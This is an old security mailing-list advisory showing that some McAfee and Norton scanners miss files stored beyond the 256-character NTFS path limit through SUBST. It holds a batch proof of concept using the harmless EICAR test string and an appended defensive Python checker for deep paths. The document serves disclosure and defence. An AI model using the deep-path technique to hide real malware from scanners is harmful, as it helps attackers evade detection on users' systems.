[NT] Virus Can Exploit Long Path under NTFS to Evade Detection
From: support@securiteam.com To: list@securiteam.com Date: Tue, 5 Feb 2002 18:07:55 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Virus Can Exploit Long Path under NTFS to Evade Detection
------------------------------------------------------------------------
SUMMARY
The NTFS file system can serve as a hiding place for viruses when they use a
file path longer than 256 characters. This vulnerability allows virus writers
to store infected files in directories that the antivirus does not check, so
the files are neither detected nor removed.
DETAILS
Vulnerable systems:
McAfee VirusScan version 4.5.1
Norton Antivirus version 5.0
Norton Antivirus version 7.5.1
Norton Antivirus version 8.00.58
Norton Antivirus Corporate version 7.60.926
The file path (drive + folder path + filename) can theoretically be up to
32000 characters long if the file system in use is NTFS. However, the way in
which Windows NT (Windows NT 4.0, Windows 2000, and Windows XP) accesses this
file system imposes a maximum of 256 characters. If you try to go deeper, you
will get a "Path too long" error.
In these operating systems, there is a way to substitute a long folder path
with a drive letter, using the "SUBST" command. If you change your current
drive to the substituted drive, the path length is reset to 3 characters
(e.g. Q:\) and Windows NT allows you to create an even deeper path.
Normally this would not alarm anyone; however, it was discovered that most
antivirus packages (such as Norton Antivirus and McAfee) were not able to
follow a deep path containing an EICAR test string.
Recreation:
(NOTE: The batch file below contains very long paths; each md, cd and subst
command, and each echo of the EICAR string, must be kept on a single line.)
@echo off
cls
echo Start test-script NTFS-limit
@echo Create a file path to the limit of NTFS
md c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
cd c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
@echo Create the Eicar test-string for PoC. This should be detected normally if you have an active virusscanner.
rem %% and ^^ are the batch escapes for a literal % and ^ in the EICAR string
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > EICAR.TXT
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR1.COM >NUL
@echo Create a subst-drive Q: for this path
subst Q: c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
@echo Create an even deeper file path (thus exceeding the limit of NTFS's explorer)
md Q:\1234567890\1234567890\1234567890
@echo Change current folder into "the deep"
Q:
cd Q:\1234567890\1234567890\1234567890
@echo Create the Eicar test-string
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > EICAR.TXT
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR2.COM >NUL
EICAR2.COM
echo.
echo End of test-script
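As an added example from the defender's side (not part of the advisory, and not any vendor's scanner code), the following Python checker walks a directory tree using the Win32 extended-length prefix, which is one way a scanner can reach files beyond the legacy path limit, and reports files whose path exceeds the advisory's 256-character figure together with whether they carry the EICAR test string. It builds a constructed deep tree in a temporary directory to demonstrate; the prefix is a no-op on POSIX, where the same logic runs unchanged.

```python
import os
import shutil
import tempfile

# EICAR test string from the advisory: a harmless signature every scanner should flag.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
LEGACY_LIMIT = 256      # path length the advisory says the NT shell enforces
WIN_PREFIX = "\\\\?\\"  # Win32 extended-length prefix; lifts the MAX_PATH limit


def extended_path(path):
    """Absolute path in the form the Win32 API accepts beyond MAX_PATH.
    On POSIX (assumption: no such API limit) the path is returned unprefixed."""
    path = os.path.abspath(path)
    if os.name == "nt" and not path.startswith(WIN_PREFIX):
        return WIN_PREFIX + path
    return path


def scan_deep(root, limit=LEGACY_LIMIT):
    """Walk root via extended_path and report files whose plain path length
    exceeds limit, i.e. the ones a legacy scanner would never open.
    Returns a list of (path, length, contains_eicar)."""
    findings = []
    for dirpath, _dirs, files in os.walk(extended_path(root)):
        for name in files:
            full = os.path.join(dirpath, name)
            shown = full[len(WIN_PREFIX):] if full.startswith(WIN_PREFIX) else full
            if len(shown) <= limit:
                continue  # reachable by a legacy scanner; not a hiding place
            try:
                with open(full, "rb") as fh:
                    head = fh.read(4096)
            except OSError:
                continue
            findings.append((shown, len(shown), EICAR in head))
    return findings


def build_demo_tree(base, depth=26):
    """Constructed copy of the advisory's layout: depth folders named
    1234567890 (well past 256 chars in total) and an EICAR.TXT at the bottom."""
    deep = os.path.join(base, *(["1234567890"] * depth))
    os.makedirs(extended_path(deep), exist_ok=True)
    with open(extended_path(os.path.join(deep, "EICAR.TXT")), "wb") as fh:
        fh.write(EICAR + b"\r\n")
    return deep


def run_demo():
    """Build the tree in a temp dir, scan it, clean up, return the findings."""
    base = tempfile.mkdtemp(prefix="ntfs-deep-")
    try:
        build_demo_tree(base)
        return scan_deep(base)
    finally:
        shutil.rmtree(extended_path(base), ignore_errors=True)
```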
ADDITIONAL INFORMATION
The information has been provided by <mailto:hans.somers@nl.abnamro.com>
Hans Somers, <mailto:lsawyer@gci.com> Leif Sawyer, and
<mailto:Remko.Catersels@asr.nl> Remko Catersels.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.